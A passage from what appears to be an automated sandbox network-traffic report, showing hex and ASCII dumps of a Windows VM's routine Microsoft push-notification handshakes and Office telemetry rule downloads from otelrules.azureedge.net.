                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                        2024-11-21 09:37:55 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 35 65 32 71 75 43 65 58 61 55 36 72 63 4e 66 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 66 39 38 30 39 65 63 66 35 37 62 66 38 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 37 48 38 66 37 55 30 55 33 58 50 6e 6c 46 42 54 37 41 34 62 47 36 44 70 6a 4e 57 77 42 59 2f 59 33 57 67 4b 61 6a 39 54 41 52 38 70 32 64 34 4b 33 68 50 6c 6e 45 70 6a 33 68 41 53 42 46 67 56 47 34 5a 33 54 6d 4a 63 74 76 39 54 7a 71 47 61 59 52 38 31 65 38 42 4a 48 76 6b 63 4f 6b 72 56 39 65 39 4c 63 4d 6b 52 76 33 79 34
                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5e2quCeXaU6rcNf3.2Context: 46f9809ecf57bf87<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ7H8f7U0U3XPnlFBT7A4bG6DpjNWwBY/Y3WgKaj9TAR8p2d4K3hPlnEpj3hASBFgVG4Z3TmJctv9TzqGaYR81e8BJHvkcOkrV9e9LcMkRv3y4
                                                                                                                                                                        2024-11-21 09:37:55 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 35 65 32 71 75 43 65 58 61 55 36 72 63 4e 66 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 66 39 38 30 39 65 63 66 35 37 62 66 38 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: 5e2quCeXaU6rcNf3.3Context: 46f9809ecf57bf87<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                        2024-11-21 09:37:55 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                        2024-11-21 09:37:55 UTC58INData Raw: 4d 53 2d 43 56 3a 20 68 4a 78 37 38 58 5a 67 71 30 65 4a 7a 45 74 59 53 58 44 79 2b 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                        Data Ascii: MS-CV: hJx78XZgq0eJzEtYSXDy+g.0Payload parsing failed.


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        98192.168.2.64981213.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:56 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:56 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 2284
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                        x-ms-request-id: 4ee4281a-701e-0098-0fa0-3b395f000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093756Z-r1d97b99577lxltfhC1TEByw2s0000000a60000000008ycq
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:56 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        99192.168.2.64981113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:56 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:56 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 3342
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                                                                                                        x-ms-request-id: f77b0594-001e-0014-3c66-3b5151000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093756Z-178bfbc474bgvl54hC1NYCsfuw000000014g00000000faxv
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:56 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        100192.168.2.64981413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:56 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:56 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                        x-ms-request-id: 6d4f85c2-e01e-0003-2b8c-3a0fa8000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093756Z-1777c6cb7544nvmshC1TEBf7qc0000000asg000000004kme
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:56 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        101192.168.2.64981313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:56 UTC191OUTGET /rules/rule90401v3s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:56 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1250
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                        ETag: "0x8DC582BDE4487AA"
                                                                                                                                                                        x-ms-request-id: 6fe4cd85-501e-0029-2ea1-3ad0b8000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093756Z-1777c6cb754whff4hC1TEBcd6c00000009hg000000007wu0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:56 UTC1250INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        102192.168.2.64981513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:57 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:57 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                                                                                                        x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093757Z-1777c6cb754dqb2khC1TEBmk1s0000000avg000000009hx0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:57 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        103192.168.2.64981613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:58 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:58 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                        x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093758Z-178bfbc474bscnbchC1NYCe7eg00000001cg000000009u7n
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:58 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        104192.168.2.64981713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:58 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:58 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                        x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093758Z-r1d97b99577lxltfhC1TEByw2s0000000a9g0000000028p5
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:58 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        105192.168.2.64982413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:58 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:59 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                        x-ms-request-id: 43ee33d3-701e-0021-1e9c-3b3d45000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093759Z-r1d97b99577d6qrbhC1TEBux5s0000000ab0000000004539
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:59 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        106192.168.2.64982513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:58 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:59 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                        ETag: "0x8DC582BE6431446"
                                                                                                                                                                        x-ms-request-id: 3a8ea751-101e-007a-417b-3b047e000000
                                                                                                                                                                        x-ms-version: 2018-03-28
